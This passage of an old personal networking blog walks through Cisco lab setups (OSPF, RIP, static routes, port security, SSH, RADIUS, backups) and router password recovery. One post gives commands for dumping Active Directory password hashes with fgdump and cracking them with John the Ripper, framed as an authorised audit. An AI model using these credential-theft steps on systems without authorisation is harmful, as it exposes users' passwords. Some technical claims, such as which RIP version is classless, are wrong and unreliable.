R2(config-router)#end

R3#conf t

R3(config)#router ospf 10

R3(config-router)#network 192.168.2.0 0.0.0.255 area 0

Notice, I just create the routes that I want advertised and place them into Area 0. All routers must have at least one interface in Area 0. I have used 10 as the OSPF process ID. this could be different on each router but its easier to remember if it is all the same.

Great. Now I verify that the routes have been propagated.

R3#sh ip route

Gateway of last resort is not set

172.16.0.0/32 is subnetted, 1 subnets

O 172.16.10.1 [110/3] via 192.168.2.1, 00:06:53, FastEthernet0/0

O 192.168.1.0/24 [110/2] via 192.168.2.1, 00:06:53, FastEthernet0/0

C 192.168.2.0/24 is directly connected, FastEthernet0/0

And can I ping the 172.16.10.1 interface?

R3#ping 172.16.10.1

Type escape sequence to abort.

Sending 5, 100-byte ICMP Echos to 172.16.10.1, timeout is 2 seconds:

!!!!!

Success rate is 100 percent (5/5), round-trip min/avg/max = 52/72/96 ms

Ok this is all good but I can see on the routing table of R3 (shown above) that I have no gateway of last resort set. I want to set this to go to loopback 0 on R1.

To fix this I'll go back to R1, tell OSPF to advertise the gateway route and then create a static route to set the gateway of last resort. Here's how:

R1(config)#router ospf 10

R1(config-router)#default-information originate

R1(config-router)#exit

R1(config)#ip route 0.0.0.0 0.0.0.0 loopback 0

R1(config)#exit

R1#sh ip route

Gateway of last resort is 0.0.0.0 to network 0.0.0.0

172.16.0.0/24 is subnetted, 1 subnets

C 172.16.10.0 is directly connected, Loopback0

10.0.0.0/24 is subnetted, 1 subnets

C 10.1.1.0 is directly connected, Loopback1

C 192.168.1.0/24 is directly connected, FastEthernet0/0

O 192.168.2.0/24 [110/2] via 192.168.1.2, 00:20:59, FastEthernet0/0

S* 0.0.0.0/0 is directly connected, Loopback0

And I have another look on R3 to make sure it has got to that network.

R3#show ip route

Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP

D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area

N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2

E1 - OSPF external type 1, E2 - OSPF external type 2

i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2

ia - IS-IS inter area, * - candidate default, U - per-user static route

o - ODR, P - periodic downloaded static route

Gateway of last resort is 192.168.2.1 to network 0.0.0.0

172.16.0.0/32 is subnetted, 1 subnets

O 172.16.10.1 [110/3] via 192.168.2.1, 00:23:59, FastEthernet0/0

O 192.168.1.0/24 [110/2] via 192.168.2.1, 00:23:59, FastEthernet0/0

C 192.168.2.0/24 is directly connected, FastEthernet0/0

O*E2 0.0.0.0/0 [110/1] via 192.168.2.1, 00:04:23, FastEthernet0/0

R3#

Bingo! All done.

Links

Here is a link to a great article on OSPF

Here is a link to some great OSPF videos

CDP - What Switch Am I Connected To?

2009-09-22T13:20:00.006+01:00

I'm sitting here on my day off, I've mowed the lawn and I had a few minutes to spare so I thought I would have a closer look at a CDP packet.

CPD stands for Cisco Discovery Protocol and it's a packet that is sent out of every interface of my switch by default. Now I'll be covering CDP in more detail in another post but I wanted to just quickly get this down because it's so cool.

How many times have you had a PC that you need to figure out which switch and which port its plugged into? Probably loads right. Me too. Well a simple packet capture for a minute or so will give you all the information to go to the right switch and the right port.

As can be seen in the screenshot below, I have Wireshark set to filter on CDP and in the first packet that comes through I can see that my PC is connect to switch S1 (Device ID: S1) and is on port FastEthernet 0/3 (Port ID: FastEthernet 0/3). How cool is that! My days of tracing cables are now over (maybe!).

Now there's some other useful information in there too like the IP Address of the switch, the Switch model and IOS version.

Just thought I would share that useful tip (well I thought it was pretty useful anyway).

IP Routing - RIP

2009-09-19T22:26:00.006+01:00

In this post i'm going to describe how to configure RIP as a routing protocol. I'll be using the network layout as shown below.

Router 1 (R1)

FastEthernet 0/0 - 192.168.1.1/24

loopback 0 - 172.16.10.0/24

Router 2 (R2)

FastEthernet 0/0 - 192.168.1.2/24

FastEthernet 1/0 - 192.168.2.1/24

Router 3 (R3)

FastEthernet 0/0 - 192.168.2.2/24

About RIP

First a bit about RIP. RIP is a distance vector dynamic routing protocol. That means it populates its routing table based on the routing updates its recieves from it's neighbors and it calculates the best path based on distance (or hops).

RIP comes in 2 versions, version 1 and version 2. RIP V1 has been around since the late 60's, is classless meaning it doesnt send subnet information, it has no authentication and it works by broadcasting the routes it knows about every 30 seconds. RIP V2 is classfull, supports authentication and uses multicast (224.0.0.9). RIP is non-proprietry so it is supported on a range of equipment and not just cisco. RIP (V1 and V2) both have an administrative distance of 120.

Configuring RIP

Okay, now the fun part. I'll be setting up RIP V2 in this post.

The way RIP works is I enable it on my router, tell it to use version 2, and tell it what networks to advertise.

To start with lets see what routes R1 knows already:

R1#show ip route

C 172.16.10.0 is directly connected, Loopback0

C 192.168.1.0/24 is directly connected, FastEthernet0/0

Okay, so it knows about the directly connrected routes. What about R3?

R3#show ip route

C 192.168.2.0/24 is directly connected, FastEthernet0/0

Great. No chance of pinging the 172.16.10.1 interface on R1 then. For this pinging business to be sucessfull I need to enable RIP V2 on all the routers. I then need to list all the networks that each router knows about. Like this.

Router 1 (R1)

R1(config)#router rip

R1(config-router)#version 2

R1(config-router)#network 192.168.1.0 255.255.255.0

R1(config-router)#network 172.16.10.0 255.255.255.0

Router 2 (R2)

R2(config)#router rip

R2(config-router)#version 2

R2(config-router)#network 192.168.1.0 255.255.255.0

R2(config-router)#network 192.168.2.0 255.255.255.0

Router 3 (R3)

R1(config)#router rip

R1(config-router)#version 2

R1(config-router)#network 192.168.2.0 255.255.255.0

Great. Now i'll check R3 routing table.

R3#show ip route

Gateway of last resort is not set

R 172.16.0.0/16 [120/1] via 192.168.2.1, 00:00:17, FastEthernet0/0

R 192.168.1.0/24 [120/1] via 192.168.2.1, 00:00:17, FastEthernet0/0

C 192.168.2.0/24 is directly connected, FastEthernet0/0

Brilliant. I can now see the routes to 172.16.0.0 network. And can I ping it?

R3#ping 172.16.10.1

Type escape sequence to abort.

Sending 5, 100-byte ICMP Echos to 172.16.10.1, timeout is 2 seconds:

!!!!!

Success rate is 100 percent (5/5), round-trip min/avg/max = 60/72/92 ms

So remember, you have to tell the router which networks you want to advertise and if you dont list the network which an interface is configured for, RIP won't advertise out of that interface.

Lastly in this section I will cover how to turn off RIP propogating out of an Interface. This could be because you have RIP enabled but on of your interfaces is connected to a untrusted network for example. To prevent the propogation you wolud make the interface passive. You will still recieve RIP updates onthe interface bt will not send them.

In the example below I'll prevent Router 2 from sending updates to Router 3.

R2(config)#router rip

R2(config-router)#version 2

R2(config-router)#network 192.168.1.0 255.255.255.0

R2(config-router)#network 192.168.2.0 255.255.255.0

R2(config-router)#passive-interface fastethernet 1/0

Configuring Authentication

Below I am going to configure authentication on my RIP updates. What I noticed in my lab was as soon as I set this up on a router the remote routers lost all routes until they too were configured for authentication. So it seems that this is an all or nothing thing.

Below I enter global config mode, create a keychain called homelab, a key, and I give the key a password of cisco.

R1#configure terminal

R1(config)#key chain homelab

R1(config-keychain)#key 1

R1(config-keychain-key)#key-string cisco

Now I enter the interface configuration and, tell it what key chain I'm using and tell it to use MD5. This has to be done on each interface that RIP will be sent or received on. Also, each neighboring router needs to use the same key (cisco) as set up in the steps above.

R1#configure terminal

R1(config)#interface fastEthernet 0/0

R1(config-if)#ip rip authentication key-chain homelab

R1(config-if)#ip rip authentication mode md5

R1(config-if)#end

Running a show ip protocols lists what the router knows about the authentication you have configured.

R2#show ip protocols

Routing Protocol is "rip"

Outgoing update filter list for all interfaces is not set

Incoming update filter list for all interfaces is not set

Sending updates every 30 seconds, next due in 3 seconds

Invalid after 180 seconds, hold down 180, flushed after 240

Redistributing: rip

Default version control: send version 2, receive version 2

Interface Send Recv Triggered RIP Key-chain

FastEthernet0/0 2 2 homelab

FastEthernet1/0 2 2 homelab

Automatic network summarization is in effect

Maximum path: 4

Routing for Networks:

172.16.0.0

192.168.1.0

192.168.2.0

Routing Information Sources:

Gateway Distance Last Update

192.168.2.2 120 00:08:39

192.168.1.1 120 00:00:03

Distance: (default is 120)

Troubleshooting RIP

The commands that I have found useful in helping to troubleshoot RIP are:

R1#show ip protocols

Routing Protocol is "rip"

Outgoing update filter list for all interfaces is not set

Incoming update filter list for all interfaces is not set

Sending updates every 30 seconds, next due in 25 seconds

Invalid after 180 seconds, hold down 180, flushed after 240

Redistributing: rip

Default version control: send version 2, receive version 2

Interface Send Recv Triggered RIP Key-chain

FastEthernet0/0 2 2

Loopback0 2 2

Automatic network summarization is in effect

Maximum path: 4

Routing for Networks:

172.16.0.0

192.168.1.0

Routing Information Sources:

Gateway Distance Last Update

192.168.1.2 120 00:00:20

Distance: (default is 120)

In the output above there are a bunch of timers (Update, Invalid, Holddown and Flush). These need to be the same on each router.

R2#show ip rip database

172.16.0.0/16 auto-summary

172.16.0.0/16

[1] via 192.168.1.1, 00:00:00, FastEthernet0/0

192.168.1.0/24 auto-summary

192.168.1.0/24 directly connected, FastEthernet0/0

192.168.2.0/24 auto-summary

192.168.2.0/24 directly connected, FastEthernet1/0

R2#show ip route rip

R 172.16.0.0/16 [120/1] via 192.168.1.1, 00:00:16, FastEthernet0/0

R2#show ip route

Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP

D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area

N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2

E1 - OSPF external type 1, E2 - OSPF external type 2

i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2

ia - IS-IS inter area, * - candidate default, U - per-user static route

o - ODR, P - periodic downloaded static route

Gateway of last resort is not set

R 172.16.0.0/16 [120/1] via 192.168.1.1, 00:00:02, FastEthernet0/0

C 192.168.1.0/24 is directly connected, FastEthernet0/0

C 192.168.2.0/24 is directly connected, FastEthernet1/0

R2#debug ip rip events

RIP event debugging is on

R2#

01:30:43: RIP: sending v2 update to 224.0.0.9 via FastEthernet0/0 (192.168.1.2)

01:30:43: RIP: Update contains 1 routes

01:30:43: RIP: Update queued

01:30:43: RIP: Update sent via FastEthernet0/0

The command above will turn on debugging for RIP updates.

Okay. That's about all I have on RIP.

IP Routing - Static Routes

2009-09-18T23:30:00.004+01:00

In this post i'm going to detail what static routes are and how to set them up.

A packet needs to know howto get from one network to another. To achieve this you can either use static or dynamic routes.

One of the benifits of using static routes is it gives you complete control over where the packets go which is great from a security point of view. The downside is that as your network grows, so does the administrative overhead.

Below I'm just going to detail how to set up routing between 2 networks.

Router 1 (R1)

FastEthernet 0/0 - 192.168.1.1/24

Router 2 (R2)

FastEthernet 0/0 - 192.168.1.2/24

FastEthernet 0/1 - 192.168.2.1/24

Router 3 (R3)

FastEthernet 0/0 - 192.168.2.2/24

Looking at my routing table on R3 I can see that I just have the connected network of 192.168.2.0

Router3#show ip route

Gateway of last resort is not set

C 192.168.2.0/24 is directly connected, FastEthernet0/0

I'll set up a new static route to the network 192.168.1.0 . I use the IP ROUTE command, list the network I want to get to and either the interface i'll be going out of or the next hop address.

Router3#configure terminal

Router3(config)#ip route 192.168.1.0 255.255.255.0 192.168.2.1

Router3(config)#end

Router3#show ip route

Gateway of last resort is not set

S 192.168.1.0/24 [1/0] via 192.168.2.1

C 192.168.2.0/24 is directly connected, FastEthernet0/0

I'll talk here a bit about administrative distances. Administrative distances are importantant in routing as each route will have one and that will be the router that the router places in the routing table.

As shown above we have 2 routes. One a Static (preceeded with a S) and the other a directly connected route (preceeded with a C)

By default, connected routes will have an administrative distance of 0 and static routes will be 1.

I could override the defaults by adding an administrative distance at the end of the command. This would be useful in creating static routes with values that are higher than those used by dynamic routing protocols. Then if a dynamic routing protocol is implimeted is will be entered into the routing table and used instead of the static route.

Now I try to ping the remote network and as long as that network knows how to get back to me my ping succeeds.

Router3#ping 192.168.1.1

Type escape sequence to abort.

Sending 5, 100-byte ICMP Echos to 192.168.1.1, timeout is 2 seconds:

!!!!!

Success rate is 100 percent (5/5), round-trip min/avg/max = 60/77/140 ms

Another option that can be appended to the end of the static route is PERMANENT. If this is used the route will stay in the routing table no matter what. Below is an example:

Router3#configure terminal

Router3(config)#ip route 192.168.1.0 255.255.255.0 fastethernet 0/0 permanent

Router3(config)#end

Here endeth my static routing post!

Switch Port Security

2009-09-17T20:19:00.006+01:00

I've been having loads of fun playing with port security today and in this post I'll share that fun with you.

Port Security is a feature thats on all Cisco switches and it allows you to control what devices access which ports on a switch. The way Port Security works is it ties MAC Addresses (this is layer 2 remember) to switch ports. These MAC addresses can either be assigned statically or dynamically by the switch taking the first device connected and remembering it's address (this is called making the port sticky). Also the port can be configured to remember more than one address.

Depending on your appetite for security you can set ports to either do nothing, log an event or shutdown when an unauthorised device is connected to a port. As I'll describe below, using the "Protect" feature you can also restrict which ports can talk to each other. This feature could be useful in malware containment.

I'll be selecting a range of ports on my switch (9 - 16) and setting them up to be access ports and to be protected, this means they will not be able to talk to each other. Protected ports can only talk to unprotected ports (which would be my server and router). I'll also configure the ports to shutdown if they are accessed by any other devices other than the first device connected to them.

S1(config)#interface range fastEthernet 0/9 - 16

S1(config-if-range)#switchport mode access

S1(config-if-range)#switchport protected

S1(config-if-range)#switchport port-security violation shutdown

S1(config-if-range)#switchport port-security mac-address sticky

S1(config-if-range)#switchport port-security

Note, although setting ports as protected can be useful in helping stop the spread of malware, it can also be a pain in the arse for remote administration if not planned properly. Another thing that is a pain in the arse is waiting for interfaces to come back up after plugging devices in and out which is due to spanning tree protocol. To save me about 50 seconds of waiting round i'll enable portfast so the interfaces come up straight away.

S1(config-if-range)#spanning-tree portfast

S1(config-if-range)#exit

As I've set up port security to shutdown ports if unauthorised access occures I'll configure the switch to automatically re-enable the ports after 10 minutes. This will save me having to manually issue the no shutdown command on the ports.

S1(config)#errdisable recovery cause psecure-violation

S1(config)#errdisable recovery interval 600

After configuring the switch I look at the running-config and I see the MAC address of the host connected to port 9 is shown.

interface FastEthernet0/9

switchport mode access

switchport protected

switchport port-security

switchport port-security mac-address sticky

switchport port-security mac-address sticky 0018.8bce.5855

no ip address

spanning-tree portfast

Okay set lets put it into pactice. I check that I cant communicate between hosts that have protected ports. My pings between the hosts on protected ports fail, and my pings to my router are fine. So far so good!

Now I swap over network cables of 2 hosts to make sure that the ports go into shutdown.

S1#show port-security interface fastethernet 0/9

Port Security : Enabled

Port status : Err-Disabled

Violation mode : Shutdown

Maximum MAC Addresses : 1

Total MAC Addresses : 1

Configured MAC Addresses : 0

Sticky MAC Addresses : 1

Aging time : 0 mins

Aging type : Absolute

SecureStatic address aging : Disabled

Security Violation count : 1

After 10 mins the port gets re-enabled. However, unless the device that was origionally connected and has it's MAC address associated with the port is re-connected the port goes stright back into shutdown and clocks up another violation. Whats more, that device cannot be used on any other switch port because it's address is tied to the port it bacame sticky with.

Once the device is connected to it's origional port and the errdisable recovery interval has expired (or we issue a shut - no shut on the port) were happily pinging the router again and I can see the violation is logged.

S1#show port-security int fa 0/9

Port Security : Enabled

Port status : SecureUp

Violation mode : Shutdown

Maximum MAC Addresses : 1

Total MAC Addresses : 1

Configured MAC Addresses : 0

Sticky MAC Addresses : 1

Aging time : 0 mins

Aging type : Absolute

SecureStatic address aging : Disabled

Security Violation count : 1

Or to see all interfaces that have had exceptions I could use:

S1#show port-security

Supposing I want to be able to connect another device to a port that I have configured for port-security or change the port of a device that has became sticky with a port? Well I would issue the following:

S1#clear port-security sticky interface fastEthernet 0/9

And then I could use that device on another port or use port 9 for a different device.

To see a list of ports that have devices tied to them either by statically assigning them by making the port sticky you can either issue:

S1#show port-security address

Or simply:

S1#show running-config

And that brings me to the end of another successful cisco adventure!

Initial Switch Configuration

2009-09-15T21:05:00.003+01:00

In this post I'm just going to detail how to get a 2950 switch up with a very basic configuration. I'll build upon this config in later posts.

I start off by giving my switch a name (S1) and enabling a secret password (okay, I know its crap but this is a lab). I'll turn off domain lookups as they are very annoying every time I mistype something and give it a default gateway.

Switch>enable

Switch#configure terminal

Switch(config)#hostname S1

S1(config)#enable secret cisco

S1(config)#no ip domain-lookup

S1(config)#ip default-gateway 10.0.1.1

Now I'll set up the console port with a 30 minute time-out and a password of cisco.

S1(config)#line console 0

S1(config-line)#logging synchronous

S1(config-line)#exec-timeout 30 0

S1(config-line)#password cisco

S1(config-line)#login

I do the same for the VTY ports.

S1(config-line)#line vty 0 4

S1(config-line)#logging synchronous

S1(config-line)#exec-timeout 30 0

S1(config-line)#password cisco

S1(config-line)#login

S1(config-line)#exit

Theres no aux port on the switch so we can move on to VLAN 1. VLAN 1 is the default VLAN and in a later post I'll move everything out of this VLAN and just use it for administration but for now I'll set it up with an IP address so it's accessible by telnet. I also turn on password encryption and show the running-config so the password encryption service can works it's magic.

S1(config)#interface vlan 1

S1(config-if)#ip address 10.0.1.210 255.255.255.0

S1(config-if)#no shutdown

S1(config-if)#exit

S1(config)#service password-encryption

S1(config)#do show running-config

Building configuration...

Current configuration : 1658 bytes

version 12.1

no service single-slot-reload-enable

no service pad

service timestamps debug uptime

service timestamps log uptime

service password-encryption

hostname S1

enable secret 5 $1$AqOD$ifdJ30Bwn.bJuBXRFov4O/

ip subnet-zero

no ip domain-lookup

spanning-tree extend system-id

interface FastEthernet0/1

no ip address

<-------------Cut------------------>

interface FastEthernet0/24

no ip address

interface Vlan1

ip address 10.0.1.210 255.255.255.0

no ip route-cache

ip default-gateway 10.0.1.1

ip http server

line con 0

exec-timeout 30 0

password 7 0822455D0A16

logging synchronous

login

line vty 0 4

exec-timeout 30 0

password 7 0822455D0A16

logging synchronous

login

line vty 5 15

login

end

Finally I set up a host entry for my router (R1), turn off the web server that I saw was on in the running-config, save the config to startup-config and reload.

S1(config)#ip host R1 10.0.1.220

S1(config)#no ip http server

S1(config)#exit

S1#copy running-config startup-config

Destination filename [startup-config]?

Building configuration...

[OK]

S1#reload

Thats it, the boring stuff is all over!

Password Recovery on a Cisco Router

2009-09-14T21:09:00.004+01:00

In this post I'll demonstrate how to perform password recovery on a Cisco router, and I'll also show you how to prevent password recovery.

Password recovery might be necessary for legtimate needs or it could be used by an attacker for nefarious purposes such as to gain access to router or switch configurations. Physical access is required for password recovery so if your routers (or switches) are in an accessible area and cannot be physically secured you may want to use the command listed below for preventing password recovery (if your router supports it that is).

Password Recovery

The process is quite simple.

Enter ROMMON mode and change the configuration register to bypass the startup-configuration (0x2142) & restart the router.
Log into the router which now has no configuration and copy the startup-config to running-config.
Change the enable password, any user passwords or anything else that needs changing.
Set the configuration register to boot back from the startup-config (0x2102).
Save the running-config back to startup-config and reload.
Access the router with your updated credentials.

So here's how this sort of looks on the router. I've cut some of the router output to save on text but it's pretty easy to follow.

To start with I connect up to the console port and reboot the router. During the very first part of boot up I press Ctrl+Break. This brings me to ROM monitor mode.

System Bootstrap, Version 12.2(8r)YN, RELEASE SOFTWARE (fc1)
TAC Support: http://www.cisco.com/tac
Copyright (c) 2002 by cisco Systems, Inc.
C800/SOHO series (Board ID: 29-129) platform with 49152 Kbytes of main memory

rommon 1 > confreg 0x2142
You must reset or power cycle for new config to take effect
rommon 2 > reset

Cisco C831 (MPC857DSL) processor (revision 0x300) with 44237K/4915K bytes of memory.
Processor board ID AMB07430HLJ (3718955443), with hardware revision 0000
Chassis serial number AMB07430HLJ
CPU rev number 7
3 Ethernet interfaces
4 FastEthernet interfaces
128K bytes of NVRAM.
16384K bytes of processor board System flash (Read/Write)
2048K bytes of processor board Web flash (Read/Write)

--- System Configuration Dialog ---

Would you like to enter the initial configuration dialog? [yes/no]: no

Press RETURN to get started!

Router>enable
Router#copy startup-config running-config
Destination filename [running-config]?

1477 bytes copied in 2.252 secs (656 bytes/sec)

R1#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)#username syn password letmein
R1(config)#enable secret letmein
R1(config)#config-register 0x2102
R1(config)#exit
R1#copy running-config startup-config
Destination filename [startup-config]?
Building configuration...
[OK]
R1#reload
Proceed with reload? [confirm]

User Access Verification
Username: syn
Password:
R1>enable
Password:
R1#

So we can see that I was able to log in and access privileged mode with my new credentials.

Password Recovery Prevention

Okay, so how do we prevent this password recovery business? Before using this method you should be warned (and IOS will warn you!) that if you forget the password you cannot recovery the password in any way and you will have to go to Cisco with your tail between your legs! So only use this if absolutely necessary and use with caution.

R1#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)#no service password-recovery
R1(config)#exit

What IOS is basically doing after setting this option is enabling ROMMON security which prevents you going into ROMMON mode and telling the router to bypass the Startup-config.

ROMMON security can be turned off from with IOS by issuing the following:

R1#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)#service password-recovery
R(config)#exit

Useful Links
Cisco Password Recovery
Cisco ROMMON Security

Password Auditing with Fgdump, John the Ripper & PowerShell

2009-09-13T14:44:00.005+01:00

As a break from my Cisco studying I thought I'd post how I perform a password audit in a Windows 2003 environment using freely available tools and a PowerShell script.

fgdump

I dump the password hashes from AD using fgdump and the command below. Password history is also dumped out. Checking out users password history can be very useful at predicting future password choice as it will reveal patterns in password selection.

fgdump.exe -h Server01 -u home\administrator -p MySuperPassword -T 5

In the command above -h is the host I'm grabbing the passwords from. The -u and -p are valid username and password. -T 5 is running 5 threads to speed things up a bit.

The passwords are dumped out to Server01.pwdump in the same directory as where fgdump is located. From there I open the PWDump file with notepad and remove all the computer accounts from the bottom of the file so I am just left with usernames and password hashes.

John The Ripper

Now I use JTR to crack the Lan Manager hashes. I could use bruteforce or dictionary attacks againast the hashes but in the command below I'm just going to use bruteforce. All LM hashes cracked will display in uppercase, but the actual passwords will like be of mixed case depending on the security policy. Passwords over 14 characters long will display as "No Password" as these are stored as NTLM Hashes.

john --incremental=lanman --session=September Server01.pwdump

Pressing the spacebar whilst JTR is cracking will give you an update on the progress. If I need to abort the session (Ctrl-C) I can restore it later using:

john --restore=September

I can view the cracked passwords and output them to a file using:

john --show Server01.pwdump >Server01-Sept-Cracked.txt

The above command will output a list of all the accounts including those not cracked (password will be ???????). If I just wanted the passwords I would just pipe Johns output to the find command.

john --show Server01.pwdump >Server01-Sept-Cracked.txt | find /i /v "?????" >Server01-Sept-CrackedOnly.txt

PowerShell

Ok. So I have my cracked password file and I'm good to go. I've created a script that I run which prompts me for my cracked password file and gives me the following options:

Find a users password
Find a users password with history
View top 20 popular passwords
Search for occurrences of a particular password
Password count (not including history)

Password-Audit.ps1

#This Section Imports Passwords from JTR file
Cls
"`n"
$result = New-Object System.Collections.ArrayList;
get-content (read-host "Enter path to JTR export file. Large files may take a few minutes to import") |
Foreach-object {
$arr = $_.Split("/:");
$temp = ('' | Select-Object Name,Password);
$temp.Name=$arr[0];
$temp.Password=$arr[1];
$result.Add($temp) | Out-Null
}

#This is the Menu Section

Function Menu {
"`n"
Write-Host "Press 1 to find a users password" -ForegroundColor Yellow
Write-Host "Press 2 to see a users password with history" -ForegroundColor Yellow
Write-Host "Press 3 to see top 20 popular passwords. This may take a few minutes" -ForegroundColor Yellow
Write-Host "Press 4 to search for occurrances of a particular password" -ForegroundColor Yellow
Write-Host "Press 5 for Password count (not including history)" -ForegroundColor Yellow
Write-Host "Press any other key to quit" -ForegroundColor Yellow
"`n"

$Number = Read-Host "Select an Option"

switch ($Number) {
1 {
Write-Host "Users Password" -ForegroundColor Red
$Name = read-host "UserName?"
$Result | where { $_.Name -match "$Name" }| where { $_.Name -notmatch "_history_" }
Menu
}

2 {
Write-Host "Users Password with history" -ForegroundColor Red
$HistoryName = read-host "UserName?"
$Result | where { $_.Name -match "$HistoryName" }
Menu
}

3 {
Write-Host "Top 20 Passwords" -ForegroundColor Red
$result | group password | sort count -Descending | select Count,Name -First 20
Menu
}

4 {
Write-Host "Weak Passwords" -ForegroundColor Red
$Password = read-host "Password?"
$Result | where { $_.Password -match "$Password" }
Menu
}

5 {
Write-Host "Total Passwords (Not including History)" -ForegroundColor Red
($Result | where { $_.Name -notmatch "_history_" }).count
Menu
}

default {
"You pressed something else. Goodbye"
}
}}
#Runs the menu
Menu

From here I can educate particular users regarding password choice or tailor user education to focus on problem areas.

I may well extend the script to look for other useful information when I have more time. The only thing I don't like is the output format if I choose option 3 (top 20 passwords) first.

Thanks to EBGreen in the Powershell Community forums for his help with some of the script.

Using RADIUS to Authenticate Logins

2009-09-09T22:38:00.006+01:00

In this post i'll detail how to set up a Windows IAS RADIUS server to authenticate user login on a router.

Windows IAS Server Setup

Create a Windows Security group with the users you want to allow access to the routers
Enable the user accounts to have Dial-in Access.
Install IAS on the server (from Add Remove programs).
Create a new cisco RADIUS Client, point it to the Router and supply a shared key. Set the Grant Remote Access.

5. Create a new Remote Access Policy with the following settings:

Windows Group (point this to the group you created)
Edit the profile and set the autentication to PAP
Under the advanced tab set the service type value to login & remove Framed-Protocol.

Thats really it. A detailed tutorial on setting up your IAS server can be found here.

Router Setup

Here I am going to configure my router to use AAA Authorization to authorise access by looking at the user credentials in Active Directory (AD). Remember, only AD users in the group I created above will be able to login with their windows credentials.

First I'll talk you through what I'm doing in the following commands.

I'm creating a local user on the router called syn. This is so I can still get into the router if my RADIUS server fails.

I enable AAA and I create a new entry in AAA to point to my RADIUS server (using the default ports) and give it a the key "cisco" to match what we set up on the RADIUS server.

I then enable my ethernet interface on the same LAN as the RADIUS server as the RADIUS source interface and create a AAA authentication login method list called AuthList. This rule will first look to authenticate by RADIUS and then locally if the RADIUS server fails. I then apply the method list to my VTY (Telnet/SSH) ports.

R1>en

Password:

R1#

R1#conf t

Enter configuration commands, one per line. End with CNTL/Z.

R1(config)#user syn password cisco

R1(config)#aaa new-model

R1(config)#radius-server host 10.0.1.230 auth-port 1645 acct-port 1646 key cisco

R1(config)#ip radius source-interface ethernet 1

R1(config)#aaa authentication login AuthList group radius local

R1(config)#line vty 0 4

R1(config-line)#login authentication AuthList

R1(config-line)#exit

R1(config)#exit

R1#

A detailed tutorial can be found here. Just remember to enable the user account for Dial-in access in the AD account properties.

After setting this up I also needed to configure RADIUS authentication on my Console port and Aux port using the following for each port:

R1(config)#line console 0

R1(config-line)#login authentication AuthList

R1(config-line)#exit

R1(config)#line aux 0

R1(config-line)#login authentication AuthList

R1(config-line)#exit

R1(config)#exit

R1#

Troubleshooting

Debugging on the router can be achieved with the following commands:

R1# terminal monitor

R1# debug aaa authentication

The command below will test a login from the router. You should be able to check your event logs and IAS logs on the RADIUS server to see this account authenticate.

R1# test aaa group radius syn SuperStrongPassword port 1645 new-code

And of course on the RADIUS server check the IAS logs (C:\windows\System32\Logfiles) and also the Event logs when troubleshooting. I hit a real issue after setting up which after a good google session turned up nothing, the event log told me the answer straight off (allow Dial-Up on the user account BTW).

Setting Up SSH on a Cisco Router

2009-09-08T22:52:00.012+01:00

In this post I'll demonstrate how to configure SSH on a cisco router.

Below are the commands I used to name the router and provide a domain name. These details are required rior to generating the key. I then generate a 2048 bit RSA key (this took abolut 10 minutes, I should have done 1024). Following the key creation I configure SSH to have a 60 minute timeout, to use SSH version 2 and to exit after 3 failed login attempts. Finally I assign SSH and Telnet (for backup) to my VTY ports and create a user called Bob.

Router>enable

Password:

Router#configure terminal

Enter configuration commands, one per line. End with CNTL/Z.

Router(config)#hostname R1

R1(config)#ip domain-name home.local

R1(config)#crypto key generate rsa general-keys modulus 2048

The name for the keys will be: R1.home.local

% The key modulus size is 2048 bits

% Generating 2048 bit RSA keys, keys will be non-exportable...[OK]

R1(config)#ip ssh time-out 60

R1(config)#ip ssh authentication-retries 3

R1(config)#ip ssh version 2

R1(config)#line vty 0 4

R1(config-line)#transport input ssh telnet

R1(config-line)#exit

R1(config)#aaa new-model

R1(config)#username bob password 0 cisco

R1(config)#exit

I use Putty to connect with SSH and I'm presented with a dialogue to accept the certificate as shown below.

I then log in with my bob credentials.

And a quick packet capture shows me that I am encrypting my traffic with SSH.

Backup & Restore IOS and Configs

2009-09-04T23:33:00.010+01:00

As with any aspect of computer data, the IOS and the router configs need backing up. This is pretty simple and in this post post I'll show a few different ways of doing this.

Backing Up

First the easy way. Copy and Paste.

Using the show commands you can output the running-config or the startup-config to screen. This config can be copied and pasted directly into a text file. In Windows use Wordpad as it keeps the formatting better.

Router#show running-config

You need to copy everything from and including the exclamation mark under the line "Current Configuration" to the last line (and including) which starts with "end".

And when you are restoring it just get yourself into configure mode (Configure Terminal) and paste it back in. Simple!

Now using TFTP.

Get yourself something running a TFTP Server. A nice free one is TFTPd32.

From your router make sure you have connectivity to your TFTP Server by pinging it. Then we use the Dir command to check the IOS name and the copy command to copy the IOS and the config to our TFTP Server.

Router#dir flash:

Router#copy flash:c831-k9o3y6-mz.124-4.T1.bin tftp

Address or name of remote host []? 10.0.1.11

Destination filename [c831-k9o3y6-mz.124-4.T1.bin]?

Router#copy startup-config tftp://10.0.1.11/startup-config

Address or name of remote host [10.0.1.11]?

Destination filename [startup-config]?

So in the example above, for the IOS i just specify I want to copy the file to TFTP. I then get prompted for an IP Address and asked to confirm the filename by pressing enter.

For the Startup-Config I specify the TFTP server and filename after the copy command. This way I only get asked to press enter to confirm both the IP and the filename.

And below I can see the progress of my copy to the TFTP Server.

One final note on backing up. Recently I was having an issue with the NVRAM holding my startup-config and I got tired of hooking up my TFTP Server. So I copied it to flash and simply restored it to running-config from there using the following command:

Router#copy flash:startup-confg running-config

Restoring

Restoring is just really the oposite. To grab the config from a TFTP server I would use:

copy tftp://10.0.1.3/startup-config running-config

or for the IOS:

copy tftp://10.0.1.3/ios-file-name.bin flash:ios-file-name.bin

The only points here are:

If your IOS is larger than the free space in flash it will overwrite the existing IOS in flash. But be sure not to reboot a router between deleting an IOS file from flash and restoring the new one.
After restoring a config all interfaces are placed in a shutdown state.
Restored configs merge into existing configs so if this isn't what you want use the erase command before restoring.

Configuring Router Interfaces

2009-08-24T18:57:00.013+01:00

In this post I'll cover the configuration of an ethernet interface on the router, and I'll demonstrate commands to interrogate and help troubleshoot the interfaces.

Lab Setup

